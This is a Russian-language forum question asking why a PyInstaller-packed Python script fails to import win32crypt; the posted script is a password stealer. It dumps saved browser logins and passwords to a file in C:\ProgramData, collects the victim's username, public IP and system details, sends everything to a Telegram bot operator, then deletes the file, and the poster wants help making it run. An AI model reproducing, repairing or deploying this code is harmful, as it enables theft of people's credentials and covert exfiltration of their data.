# Не удается найти указанный модуль "win32crypt"

Tags: python

Вот код:

```
token = '(Скрыл)'
adm = (Скрыл)
bot = telebot.TeleBot(token)




f = open(r'C:\ProgramData\system.txt', 'w')

for key, account in passwordsRecovery():
       passw = '['  + str(key) + '] '+'\n| SITE: ' + account['url'] + '\n| USER: ' + account['login'] + '\n| PASS: ' + account['password'] + '\n'
       f.write(passw)
f.close()
filename = r'C:\ProgramData\system.txt'

def send_info():
    username = os.getlogin()
    
    r = requests.get('http://ip.42.pl/raw')
    IP = r.text
    windows = platform.platform()
    processor = platform.processor()
    systemali = platform.version() 
    bot.send_message(adm, "Имя: " + username + "\nIP: " + IP + "\nOS: " + windows +
        "\n Процессор: " + processor + "\nВерсия ОС : " + systemali)

doc = open(r'C:\ProgramData\system.txt', 'rb')
bot.send_document(adm, doc)
doc.close()
send_info()
os.remove(r'C:\ProgramData\system.txt')
```

А вот ошибка:

```
Traceback (most recent call last):
File "file.py", line 5, in <module>
File "c:\users\i\appdata\local\programs\python\python38--2\lib\site-packages\PyInstaller\loader\pyimod03_importers.py"
line 493, in exec module
exec(bytecode, module. dict
File "hackpy\passwords.py", line 4, in <module>
ImportError: DLL load failed while importing win32crypt: Не найден указанный модуль.
[1352] Failed to execute script file
```

Comment: https://ru.stackoverflow.com/questions/1099997/importerror-dll-load-failed-%D0%9D%D0%B5-%D0%BD%D0%B0%D0%B9%D0%B4%D0%B5%D0%BD-%D1%83%D0%BA%D0%B0%D0%B7%D0%B0%D0%BD%D0%BD%D1%8B%D0%B9-%D0%BC%D0%BE%D0%B4%D1%83%D0%BB%D1%8C-%D0%9D%D0%B5-%D1%83%D0%B2%D0%B8%D0%B4%D0%B8%D1%82-cv2

Comment: Не помогло вообще, не то сказано и версия у меня 3,8, а там 3,7